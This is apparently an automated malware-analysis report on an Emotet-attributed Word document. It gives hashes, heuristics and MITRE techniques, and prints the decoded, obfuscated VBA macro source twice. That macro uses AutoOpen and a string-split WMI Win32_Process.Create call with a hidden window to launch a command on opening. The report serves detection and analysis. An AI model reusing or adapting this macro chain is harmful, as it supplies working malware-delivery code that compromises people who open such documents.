Emotet Office (OLE) malware analysis — malicious · 1dadd763f1ed5132

MALICIOUS

Office (OLE)

135.8 KB Created: 2019-05-06 13:37:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: e3cb8bcb7ca4fccf68e0b80722902986 SHA-1: 706713951d2a03c78d00bba5928cc7dd206653ab SHA-256: 1dadd763f1ed5132de6c4bb9963d4e58e7054c56f232b8dfdd3d6853294861e5

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is identified as malicious by ClamAV with a specific Emotet signature. Critical heuristics indicate the presence of VBA macros that utilize GetObject and CreateObject to launch Win32_Process, a common technique for executing downloaded payloads. The autoopen macro further suggests immediate execution upon opening the document.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6963215-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6963215-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3777 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3777 bytes
SHA-256: `ab119dfcbb4ea9f0e5c6b47ce062585e341a372c9396d515ef444fb1ebca935d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Z856963" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "j6__0708" Attribute VB_Base = "0{C65F613D-F1EE-4F9A-915B-4785CAEEBC73}{7657BC4F-E26B-4FC5-BCB2-7C99649C69DE}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "F27776" Attribute VB_Name = "t280281" Attribute VB_Name = "o78_141" Attribute VB_Name = "n596_952" Attribute VB_Base = "0{EBB0C2DF-00E7-454E-A202-949F076578BB}{10C2318E-9A09-49F9-B63F-0046742D012B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "H647502_" Function o1845290(w384214) While V996_593 And 356701372 Wend While J79437 And 100206966 Wend Set o1845290 = CVar(w384214) While H453_79 And 783194112 Wend While B10103 And 623024061 Wend End Function Sub _ autoopen() On Error Resume Next While K1194093 And 118413774 Wend While d087_324 And 868337191 Wend Call D982896_ While i787291 And 270918215 Wend While A52092 And 123278912 Wend While T3708425 And 543443893 Wend End Sub Attribute VB_Name = "k864157" Function D982896_() On Error Resume Next While j075205 And 751277254 Wend While t130__18 And 501459720 Wend While v674033 And 941319169 Wend Q4_8041_ = j6__0708.P96426_.PasswordChar + n596_952.h95_210 + j6__0708.P96426_.ControlSource + n596_952.S668539 + j6__0708.P96426_ + j6__0708.P96426_.PasswordChar + n596_952.E769331_ + j6__0708.P96426_ + j6__0708.P96426_ + n596_952.A20201 + j6__0708.P96426_.ControlSource + n596_952.h65870 + j6__0708.P96426_.ControlSource While i9_28181 And 257383291 Wend While a64598_ And 54261969 Wend Set K2302_ = o1845290(GetObject("win" + _ "mgmt" + "s:Wi" + "n32_Pr" _ + "ocess")) While J61845 And 996734424 Wend While o50543 And 9845112 Wend While L7_4_85 And 195162931 Wend K2302_.Create Q83009 + Q4_8041_ + B8617_, i8360537, d3733_, j6078588 While d8925_8 And 743433576 Wend While R_7741 And 64425475 Wend End Function Attribute VB_Name = "h12189" Public Function d3733_() While F53778 And 702902986 Wend While J6043977 And 230351976 Wend Set d3733_ = o1845290(GetObject("win" _ + "mgmt" + "s:Wi" _ + "n32_Pr" + "ocess" + "S" _ + "tartup")) While N4398_ And 216373571 Wend While j08737 And 373364026 Wend L90149 = vbError - vbError While s_52088 And 976131167 Wend While d9622526 And 234475133 Wend While p48786 And 919274493 Wend With d3733_ While j683522 And 902427850 Wend While H590023 And 770700491 Wend While M009_39 And 229586958 Wend . _ ShowWindow = L90149 + L90149 + L90149 + L90149 + L90149 + L90149 + L90149 While E9522294 And 524033723 Wend While i9389585 And 5853147 Wend End With While z195_8 And 562694830 Wend While H31237 And 511724706 Wend End Function

SHA-256: ab119dfcbb4ea9f0e5c6b47ce062585e341a372c9396d515ef444fb1ebca935d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Z856963"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "j6__0708"
Attribute VB_Base = "0{C65F613D-F1EE-4F9A-915B-4785CAEEBC73}{7657BC4F-E26B-4FC5-BCB2-7C99649C69DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "F27776"

Attribute VB_Name = "t280281"

Attribute VB_Name = "o78_141"

Attribute VB_Name = "n596_952"
Attribute VB_Base = "0{EBB0C2DF-00E7-454E-A202-949F076578BB}{10C2318E-9A09-49F9-B63F-0046742D012B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "H647502_"
Function o1845290(w384214)
         While V996_593 And 356701372
      Wend
         While J79437 And 100206966
      Wend
Set o1845290 = CVar(w384214)
         While H453_79 And 783194112
      Wend
         While B10103 And 623024061
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While K1194093 And 118413774
      Wend
         While d087_324 And 868337191
      Wend
Call D982896_
         While i787291 And 270918215
      Wend
         While A52092 And 123278912
      Wend
         While T3708425 And 543443893
      Wend
End Sub


Attribute VB_Name = "k864157"
Function D982896_()
On Error Resume Next
         While j075205 And 751277254
      Wend
         While t130__18 And 501459720
      Wend
         While v674033 And 941319169
      Wend
Q4_8041_ = j6__0708.P96426_.PasswordChar + n596_952.h95_210 + j6__0708.P96426_.ControlSource + n596_952.S668539 + j6__0708.P96426_ + j6__0708.P96426_.PasswordChar + n596_952.E769331_ + j6__0708.P96426_ + j6__0708.P96426_ + n596_952.A20201 + j6__0708.P96426_.ControlSource + n596_952.h65870 + j6__0708.P96426_.ControlSource
         While i9_28181 And 257383291
      Wend
         While a64598_ And 54261969
      Wend
Set K2302_ = o1845290(GetObject("win" + _
"mgmt" + "s:Wi" + "n32_Pr" _
+ "ocess"))
         While J61845 And 996734424
      Wend
         While o50543 And 9845112
      Wend
         While L7_4_85 And 195162931
      Wend
K2302_.Create Q83009 + Q4_8041_ + B8617_, i8360537, d3733_, j6078588
         While d8925_8 And 743433576
      Wend
         While R_7741 And 64425475
      Wend
End Function


Attribute VB_Name = "h12189"

Public Function d3733_()
         While F53778 And 702902986
      Wend
         While J6043977 And 230351976
      Wend
Set d3733_ = o1845290(GetObject("win" _
+ "mgmt" + "s:Wi" _
+ "n32_Pr" + "ocess" + "S" _
+ "tartup"))
         While N4398_ And 216373571
      Wend
         While j08737 And 373364026
      Wend
L90149 = vbError - vbError
         While s_52088 And 976131167
      Wend
         While d9622526 And 234475133
      Wend
         While p48786 And 919274493
      Wend
With d3733_
         While j683522 And 902427850
      Wend
         While H590023 And 770700491
      Wend
         While M009_39 And 229586958
      Wend
. _
ShowWindow = L90149 + L90149 + L90149 + L90149 + L90149 + L90149 + L90149
         While E9522294 And 524033723
      Wend
         While i9389585 And 5853147
      Wend
End With
         While z195_8 And 562694830
      Wend
         While H31237 And 511724706
      Wend
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.